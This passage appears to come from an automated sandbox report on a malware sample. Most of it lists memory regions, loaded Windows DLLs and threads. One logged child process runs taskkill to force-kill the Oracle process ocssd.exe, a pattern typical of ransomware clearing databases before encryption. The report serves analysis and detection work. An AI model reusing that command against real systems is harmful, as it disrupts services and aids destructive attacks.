= "pagefile_0x0000000000010000" filename = "" Region: id = 1990 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1991 start_va = 0xd0000 end_va = 0xd6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1992 start_va = 0x1e0000 end_va = 0x246fff entry_point = 0x1e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1993 start_va = 0x250000 end_va = 0x251fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1994 start_va = 0x260000 end_va = 0x263fff entry_point = 0x260000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 1995 start_va = 0x270000 end_va = 0x270fff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 1996 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 1997 start_va = 0x290000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 1998 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 1999 start_va = 0x3a0000 end_va = 0x527fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 2000 start_va = 0x530000 end_va = 0x6b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2001 start_va = 0x6c0000 end_va = 0x1abffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 2002 start_va = 0x1ac0000 end_va = 0x1b7ffff entry_point = 0x1ac0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 2003 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 2004 start_va = 0x1b90000 end_va = 0x1b90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b90000" filename = "" Region: id = 2005 start_va = 0x1bc0000 end_va = 0x1c3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001bc0000" filename = "" Region: id = 2006 start_va = 0x1d40000 end_va = 0x1dbffff entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 2007 start_va = 0x1e70000 end_va = 0x1eeffff entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 2008 start_va = 0x1f00000 end_va = 0x1f7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 2009 start_va = 0x1f80000 end_va = 0x224efff entry_point = 0x1f80000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2010 start_va = 0x2250000 end_va = 0x22cffff entry_point = 0x0 region_type = private name = "private_0x0000000002250000" filename = "" Region: id = 2011 start_va = 0x23e0000 end_va = 0x245ffff entry_point = 0x0 region_type = private name = "private_0x00000000023e0000" filename = "" Region: id = 2012 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2013 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2014 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2015 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 2016 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2017 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2018 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 2019 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 2020 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2021 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2022 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2023 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2024 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2025 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2026 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2027 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 2028 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2029 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2030 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2031 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2032 start_va = 0x7fefd5a0000 end_va = 0x7fefd5b3fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2033 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2034 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2035 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2036 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2037 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2038 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2039 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2040 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2041 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2042 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2043 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2044 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2045 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2046 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2047 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2048 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 2049 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 2050 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 2051 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Thread: id = 146 os_tid = 0x2ac Thread: id = 182 os_tid = 0x8c8 Thread: id = 186 os_tid = 0x8b4 Thread: id = 189 os_tid = 0x7f4 Thread: id = 190 os_tid = 0x928 Process: id = "22" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x74b7d000" os_pid = "0x7cc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM ocssd.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1666 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1667 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1668 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1669 start_va = 0x150000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1670 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1671 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1672 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1673 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 1674 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1675 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1676 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 1677 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1678 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 1679 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1680 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2208 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2209 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2210 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2211 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 2212 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2213 start_va = 0xe0000 end_va = 0xe3fff entry_point = 0xe0000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 2214 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2215 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 2216 start_va = 0x110000 end_va = 0x110fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 2217 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 2218 start_va = 0x1d0000 end_va = 0x28ffff entry_point = 0x1d0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 2219 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 2220 start_va = 0x4a0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 2221 start_va = 0x4b0000 end_va = 0x637fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 2222 start_va = 0x640000 end_va = 0x7c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 2223 start_va = 0x7d0000 end_va = 0x1bcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 2224 start_va = 0x1c30000 end_va = 0x1caffff entry_point = 0x0 region_type = private name = "private_0x0000000001c30000" filename = "" Region: id = 2225 start_va = 0x1cb0000 end_va = 0x1d2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 2226 start_va = 0x1d50000 end_va = 0x1dcffff entry_point = 0x0 region_type = private name = "private_0x0000000001d50000" filename = "" Region: id = 2227 start_va = 0x1e10000 end_va = 0x1e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 2228 start_va = 0x1e90000 end_va = 0x215efff entry_point = 0x1e90000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2229 start_va = 0x2260000 end_va = 0x22dffff entry_point = 0x0 region_type = private name = "private_0x0000000002260000" filename = "" Region: id = 2230 start_va = 0x2340000 end_va = 0x23bffff entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 2231 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2232 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2233 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2234 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 2235 start_va = 0x7fef7020000 end_va = 0x7fef7033fff entry_point = 0x7fef7020000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 2236 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2237 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2238 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 2239 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 2240 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2241 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2242 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2243 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2244 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2245 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2246 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2247 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 2248 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2249 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2250 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2251 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2252 start_va = 0x7fefd5a0000 end_va = 0x7fefd5b3fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2253 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2254 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2255 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2256 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2257 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2258 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2259 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2260 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2261 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2262 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2263 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2264 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2265 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2266 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2267 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2268 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 2269 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 2270 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 2271 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Thread: id = 159 os_tid = 0x51c Thread: id = 194 os_tid = 0x94c Thread: id = 200 os_tid = 0x998 Thread: id = 207 os_tid = 0xa24 